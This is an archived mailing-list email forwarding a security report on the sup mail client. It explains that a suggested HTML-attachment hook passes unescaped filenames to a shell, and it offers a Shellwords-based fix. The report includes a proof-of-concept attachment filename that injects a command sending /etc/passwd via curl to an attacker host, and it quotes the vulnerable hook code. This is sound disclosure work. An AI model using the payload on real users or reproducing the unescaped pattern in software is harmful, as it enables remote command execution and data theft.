From mboxrd@z Thu Jan  1 00:00:00 1970
Return-Path: <eg@gaute.vetsj.com>
Received: from localhost (c4C8F5BC1.dhcp.as2116.net. [193.91.143.76])
        by mx.google.com with ESMTPSA id ua4sm3010808lbb.17.1969.12.31.16.00.00
        (version=TLSv1.2 cipher=RC4-SHA bits=128/128);
        Sun, 18 Aug 2013 11:15:41 -0700 (PDT)
Date: Sun, 18 Aug 2013 20:14:38 +0200
From: Gaute Hope <eg@gaute.vetsj.com>
To: sup-talk <sup-talk@rubyforge.org>, 
 sup-devel <sup-devel@rubyforge.org>
Message-ID: <1376849419-sup-8191@qwerzila>
Subject: Fwd: Security issue with suggested configuration of sup
Mime-Version: 1.0
Content-Type: text/plain;
 charset=UTF-8
Content-Transfer-Encoding: quoted-printable
User-Agent: Sup/git

Greetings suppers,

joernchen has pointed out to me that our suggested hook for viewing html
attachment has a serious security issue. The updated suggestion in [0] (w=
iki)
should be safer.


Please make sure that you update your mime-decode hook!


Best regards, Gaute



[0] https://github.com/sup-heliotrope/sup/wiki/Viewing-Attachments



--- Begin forwarded message from joernchen ---
From: joernchen <...>
To: eg <eg@gaute.vetsj.com>
Date: Sat, 17 Aug 2013 14:14:29 +0200
Subject: Security issue with suggested configuration of sup

[...]

At [0] the suggested configuration for viewing HTML attachments with
sup using the mime-decode hook is given as follows:

unless sibling_types.member? "text/plain"
  case content_type
  when "text/html"
    `/usr/bin/w3m -dump -T #{content_type} '#{filename}'`
  end
end

This piece of code however is prone to command injection via the file
name of the attached file. The command injection triggers upon sup
indexing the mail, so no user interaction is needed.

A better approach would be the following:

require 'shellwords'
unless sibling_types.member? "text/plain"
  case content_type
  when "text/html"
    `/usr/bin/w3m -dump -T #{content_type} #{Shellwords.escape filename}`=

  end
end

[...]

A simple PoC would be sending an email with a file attachment named
like:

'$(cd .. && cd .. && cd .. && cd .. && cd etc && curl --data @passwd atta=
cker.org)'.html

to a sup user making use of the suggested decode hook.

[0] https://github.com/sup-heliotrope/sup/wiki/Viewing-Attachments

[...]